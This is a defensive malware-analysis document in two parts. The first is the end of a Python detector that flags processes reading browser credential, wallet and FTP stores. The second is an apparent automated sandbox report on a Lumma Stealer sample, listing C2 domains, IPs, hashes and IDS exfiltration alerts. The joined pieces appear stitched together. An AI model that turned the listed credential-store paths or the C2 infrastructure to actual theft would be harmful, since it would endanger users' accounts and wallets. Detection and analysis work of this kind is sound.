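        rec["severity"] = "high" if len(rec["families"]) >= fanout_threshold else "medium"
    return findings


APPDATA = r"C:\Users\user\AppData"
SAMPLE = r"C:\Users\user\Desktop\file.exe"
SAMPLE_EVENTS = [  # constructed telemetry; paths mirror the report's "File opened" list
    {"pid": 7748, "image": SAMPLE, "path": APPDATA + r"\Local\Google\Chrome\User Data\Default\Login Data"},
    {"pid": 7748, "image": SAMPLE, "path": APPDATA + r"\Local\Microsoft\Edge\User Data\Default\Network\Cookies"},
    {"pid": 7748, "image": SAMPLE, "path": APPDATA + r"\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.json"},
    {"pid": 7748, "image": SAMPLE, "path": APPDATA + r"\Roaming\Exodus\exodus.wallet"},
    {"pid": 7748, "image": SAMPLE, "path": APPDATA + r"\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn"},
    {"pid": 7748, "image": SAMPLE, "path": APPDATA + r"\Roaming\SmartFTP\Client 2.0\Favorites"},
    {"pid": 7748, "image": SAMPLE, "path": r"C:\Users\user\Documents\PALRGUCVEH"},
    {"pid": 4242, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": APPDATA + r"\Local\Google\Chrome\User Data\Default\Login Data"},
    {"pid": 5151, "image": r"C:\Windows\explorer.exe", "path": r"C:\Users\user\Documents\notes.txt"},
]

if __name__ == "__main__":
    for pid, rec in analyze(SAMPLE_EVENTS).items():
        print(f"pid {pid} {rec['image']}: {rec['severity']} "
              f"({len(rec['families'])} store families, {len(rec['paths'])} reads)")
```

On the constructed events only PID 7748 is reported: chrome.exe reading its own Login Data is suppressed by the owner check, and the Documents directory walk is not a credential store, so it contributes nothing. The fan-out threshold is the tuning knob: a password-manager importer legitimately reads one browser's Login Data, but nothing legitimate reads Chromium credentials, Firefox key material, a wallet and an FTP favorites file in one run.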

            Remote Access Functionality

Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: file.exe PID: 7748, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix

The matrix was flattened during extraction and is reconstructed here by tactic. Only cells carrying a figure were populated for this sample; the figure in brackets is the one attached to the cell in the original matrix. Cells without a figure are the matrix's default technique placeholders and are not listed.

Execution: Windows Management Instrumentation [2]; Command and Scripting Interpreter [2]; PowerShell [1]
Persistence: DLL Side-Loading [1]
Privilege Escalation: Process Injection [1]; DLL Side-Loading [1]
Defense Evasion: Virtualization/Sandbox Evasion [34]; Process Injection [1]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [12]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping [2]
Discovery: Security Software Discovery [741]; Virtualization/Sandbox Evasion [34]; Process Discovery [2]; File and Directory Discovery [1]; System Information Discovery [223]
Collection: Archive Collected Data [1]; Data from Local System [41]
Command and Control: Encrypted Channel [11]; Non-Application Layer Protocol [2]; Application Layer Protocol [113]

No populated cells under Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration or Impact.
Behavior Graph Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |

Dropped Files: No Antivirus matches
Unpacked PE Files: No Antivirus matches
Domains: No Antivirus matches

URLs
Source | Detection | Scanner | Label | Link
https://cook-rain.sbs/apiMl | 100% | Avira URL Cloud | malware |
https://cook-rain.sbs/api:n | 100% | Avira URL Cloud | malware |
https://cook-rain.sbs/api) | 100% | Avira URL Cloud | malware |
https://contile-images.services.mozilla.com | 0% | Avira URL Cloud | safe |
https://cook-rain.sbs/P | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
cook-rain.sbs | 188.114.97.3 | true | false | - | high
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | - | high

Name | Malicious | Antivirus Detection | Reputation
https://cook-rain.sbs/api | false | - | high
p3ar11fter.sbs | false | - | high
peepburry828.sbs | false | - | high
p10tgrace.sbs | false | - | high
processhol.sbs | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr | file.exe, 00000000.00000003.1443482290.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cook-rain.sbs/ | file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmp; file.exe, 00000000.00000003.1484354122.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp; file.exe, 00000000.00000003.1520806713.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp; file.exe, 00000000.00000002.1546918977.0000000000F70000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64 | file.exe, 00000000.00000003.1443519497.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp; file.exe, 00000000.00000003.1466794753.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://ocsp.rootca1.amazontrust.com0: | file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://cook-rain.sbs/api:n | file.exe, 00000000.00000002.1546857241.0000000000F51000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.ecosia.org/newtab/ | file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | file.exe, 00000000.00000003.1421874521.00000000059E8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg | file.exe, 00000000.00000003.1443482290.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://cook-rain.sbs/apiMl | file.exe, 00000000.00000003.1520903809.0000000000F51000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700 | file.exe, 00000000.00000003.1443482290.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cook-rain.sbs/apiY | file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://x1.c.lencr.org/0 | file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://x1.i.lencr.org/0 | file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi | file.exe, 00000000.00000003.1443482290.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | file.exe, 00000000.00000003.1420825256.00000000056E2000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contile-images.services.mozilla.com | file.exe, 00000000.00000003.1443519497.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp; file.exe, 00000000.00000003.1466794753.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cook-rain.sbs/api) | file.exe, 00000000.00000003.1420595420.0000000000F74000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.microsoft.c | file.exe, 00000000.00000003.1520903809.0000000000F46000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta | file.exe, 00000000.00000003.1443519497.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp; file.exe, 00000000.00000003.1466794753.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://support.mozilla.org/products/firefoxgro.all | file.exe, 00000000.00000003.1421874521.00000000059E8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | file.exe, 00000000.00000003.1373982930.00000000056FB000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.1374055399.00000000056F8000.00000004.00000800.00020000.00000000.sdmp; file.exe, 00000000.00000003.1374195615.00000000056F8000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://cook-rain.sbs/P | file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware |
                                                                            unknown
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
IP: 188.114.97.3
Domain: cook-rain.sbs
Country: European Union
ASN: 13335
ASN Name: CLOUDFLARENETUS
Malicious: false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1560145
Start date and time: 2024-11-21 13:09:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 23s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: file.exe
Time: 07:10:14
Type: API Interceptor
Description: 8x Sleep call for process: file.exe modified
Match: 188.114.97.3 (associated sample name / URL: detection, threat name; context)
• RFQ 3100185 MAHAD.exe: malicious, FormBook (context: www.rgenerousrs.store/o362/)
• A2028041200SD.exe: malicious, FormBook (context: www.beylikduzu616161.xyz/2nga/)
• Delivery_Notification_00000260791.doc.js: malicious, Unknown (context: radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45)
• ce.vbs: malicious, Unknown (context: paste.ee/d/lxvbq)
• Label_00000852555.doc.js: malicious, Unknown (context: tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25)
• PO 20495088.exe: malicious, FormBook (context: www.ssrnoremt-rise.sbs/3jsc/)
• QUOTATION_NOVQTRA071244#U00faPDF.scr.exe: malicious, Snake Keylogger (context: filetransfer.io/data-package/zWkbOqX7/download)
• http://kklk16.bsyo45ksda.top: malicious, Unknown (context: kklk16.bsyo45ksda.top/favicon.ico)
• gusetup.exe: malicious, Unknown (context: www.glarysoft.com/update/glary-utilities/pro/pro50/)
• Online Interview Scheduling Form.lnk: malicious, Ducktail (context: gmtagency.online/api/check)
Match: cook-rain.sbs (associated sample name / URL: detection, threat name; context)
• file.exe: malicious, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar (context: 188.114.96.3)
• file.exe: malicious, LummaC (context: 188.114.96.3)
• file.exe: malicious, LummaC (context: 188.114.96.3)
• file.exe: malicious, LummaC (context: 188.114.97.3)
• file.exe: malicious, LummaC (context: 188.114.97.3)
• file.exe: malicious, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar (context: 188.114.96.3)
• file.exe: malicious, LummaC (context: 188.114.96.3)
• file.exe: malicious, LummaC (context: 188.114.96.3)
• file.exe: malicious, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar (context: 188.114.97.3)
• file.exe: malicious, LummaC (context: 188.114.97.3)
Match: s-part-0017.t-0009.t-msedge.net (associated sample name / URL: detection, threat name; context)
• file.exe: malicious, Unknown (context: 13.107.246.45)
• file.exe: malicious, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar (context: 13.107.246.45)
• Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe: malicious, Snake Keylogger, VIP Keylogger (context: 13.107.246.45)
• APPENDIX FORM_N#U00b045013-20241120.com.exe: malicious, Remcos, GuLoader (context: 13.107.246.45)
• file.exe: malicious, LummaC (context: 13.107.246.45)
• Payslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htm: malicious, BlackHacker JS Obfuscator (context: 13.107.246.45)
• phish_alert_sp2_2.0.0.0.eml: malicious, HTMLPhisher (context: 13.107.246.45)
• file.exe: malicious, LummaC (context: 13.107.246.45)
• CB1.exe: malicious, BlackMoon (context: 13.107.246.45)
• +11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msg: malicious, HtmlDropper (context: 13.107.246.45)
Match: CLOUDFLARENETUS (associated sample name / URL: detection, threat name; context)
• MV BBG MUARA Ship's Particulars.pdf.scr.exe: malicious, AgentTesla (context: 104.26.12.205)
• CONTRACT COPY PRN00720387_pdf.exe: malicious, GuLoader (context: 188.114.97.3)
• https://bitly.cx/aMW9O9: malicious, Unknown (context: 188.114.96.3)
• file.exe: malicious, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar (context: 188.114.96.3)
• Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe: malicious, Snake Keylogger, VIP Keylogger (context: 188.114.97.3)
• PO-841122676_g787.exe: malicious, GuLoader (context: 188.114.97.3)
• file.exe: malicious, LummaC (context: 188.114.96.3)
• Payslip-21 November, 2024 ZmPQwjYq1NGSTsWga2.htm: malicious, BlackHacker JS Obfuscator (context: 104.17.25.14)
• phish_alert_sp2_2.0.0.0.eml: malicious, HTMLPhisher (context: 1.1.1.1)
• CHARIKLIA JUNIOR DETAILS.pdf.scr.exe: malicious, AgentTesla (context: 104.26.12.205)
Match: a0e9f5d64349fb13191bc781f81f42e1 (associated sample name / URL: detection, threat name; context)
• file.exe: malicious, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar (context: 188.114.97.3)
• file.exe: malicious, LummaC (context: 188.114.97.3)
• MDE_File_Sample_37ce4d95fd579c36340b1d1490e2ef7623af4bb3.zip: malicious, LummaC (context: 188.114.97.3)
• file.exe: malicious, LummaC (context: 188.114.97.3)
• file.exe: malicious, LummaC (context: 188.114.97.3)
• file.exe: malicious, LummaC (context: 188.114.97.3)
• file.exe: malicious, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar (context: 188.114.97.3)
• kXPgmYpAPg.doc: malicious, Unknown (context: 188.114.97.3)
• file.exe: malicious, LummaC (context: 188.114.97.3)
• file.exe: malicious, LummaC (context: 188.114.97.3)
                                                                            No context
                                                                            No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.947596249136269
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'843'200 bytes
MD5: 02fc2c82de8b775d97a32a39e1d34960
SHA1: 74496749c3f724136f259865d542221a22eac880
SHA256: 3231ef2658fb47a9a80f3ea5238ff1ed3afd67384a55335e9bce3660adf6b4f6
SHA512: 068084e5b8c5bb69b0ab1465350eef4833b649f1bcfc2b6cf07d8ace32f2382b2dcf732c773edef9261bd2b83ae78493168dd3f5df9ad13859297d3cd3a92386
SSDEEP: 49152:tT0EQS58zoFESwPOxz3rK2xp78Z/36krqSsJ5zmn:tTXJ58zoFESXxz3m89M/36Ga5E
TLSH: 94853395FF0265F8D5A5B0705DFBA89B7739936638FA8C6993C11728616FCE62203C30
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....r;g............................. I...........@..........................PI.....f.....@.................................\p..p..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x892000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x673B72E6 [Mon Nov 18 17:01:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5705c | 0x70 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x56000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x571f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x55000 | 0x25e00 | e9e0a6c9a7202e3e93389643e2da4d16 | False | 0.9973442656765676 | data | 7.970159978732974 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x56000 | 0x2b0 | 0x200 | 69828a6baa9d7a0a4d1538bd65398aa8 | False | 0.80078125 | data | 6.0686814441946355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x57000 | 0x1000 | 0x200 | b32b7c4ad821f82288405a0d11e75f2f | False | 0.15625 | data | 1.1076713340399604 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x58000 | 0x2a0000 | 0x200 | bc44c9f87c5d8e025b9e1e526d5ea046 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mfsomwhk | 0x2f8000 | 0x199000 | 0x198600 | 625f54b5c0586c404e96d4f0c2aa7dda | False | 0.9946697084481175 | data | 7.952928522417956 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nugibpud | 0x491000 | 0x1000 | 0x400 | 2180bc9a1c8b8345eb058347deecfeb7 | False | 0.77734375 | data | 6.002846499477447 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x492000 | 0x3000 | 0x2200 | 47ec8153d752be9ff7e9f10773b4393b | False | 0.06135110294117647 | DOS executable (COM) | 0.7947005205936104 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x490344 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-21T13:10:13.209048+0100 | 2057730 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs) | 1 | 192.168.2.10 | 57797 | 1.1.1.1 | 53 | UDP
2024-11-21T13:10:14.843348+0100 | 2057731 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) | 1 | 192.168.2.10 | 49706 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:14.843348+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49706 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:15.563581+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.10 | 49706 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:15.563581+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49706 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:16.921833+0100 | 2057731 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) | 1 | 192.168.2.10 | 49712 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:16.921833+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49712 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:17.633811+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.10 | 49712 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:17.633811+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49712 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:19.305479+0100 | 2057731 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) | 1 | 192.168.2.10 | 49718 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:19.305479+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49718 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:20.231641+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.10 | 49718 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:21.683352+0100 | 2057731 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) | 1 | 192.168.2.10 | 49724 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:21.683352+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49724 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:24.050016+0100 | 2057731 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) | 1 | 192.168.2.10 | 49730 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:24.050016+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49730 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:26.474644+0100 | 2057731 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) | 1 | 192.168.2.10 | 49736 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:26.474644+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49736 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:28.989608+0100 | 2057731 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) | 1 | 192.168.2.10 | 49744 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:28.989608+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49744 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:33.166293+0100 | 2057731 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI) | 1 | 192.168.2.10 | 49762 | 188.114.97.3 | 443 | TCP
2024-11-21T13:10:33.166293+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49762 | 188.114.97.3 | 443 | TCP
                                                                            Nov 21, 2024 13:10:28.994514942 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.994534016 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:28.994688034 CET49744443192.168.2.10188.114.97.3
                                                                            Nov 21, 2024 13:10:28.994716883 CET44349744188.114.97.3192.168.2.10
                                                                            Nov 21, 2024 13:10:28.994854927 CET49744443192.168.2.10188.114.97.3
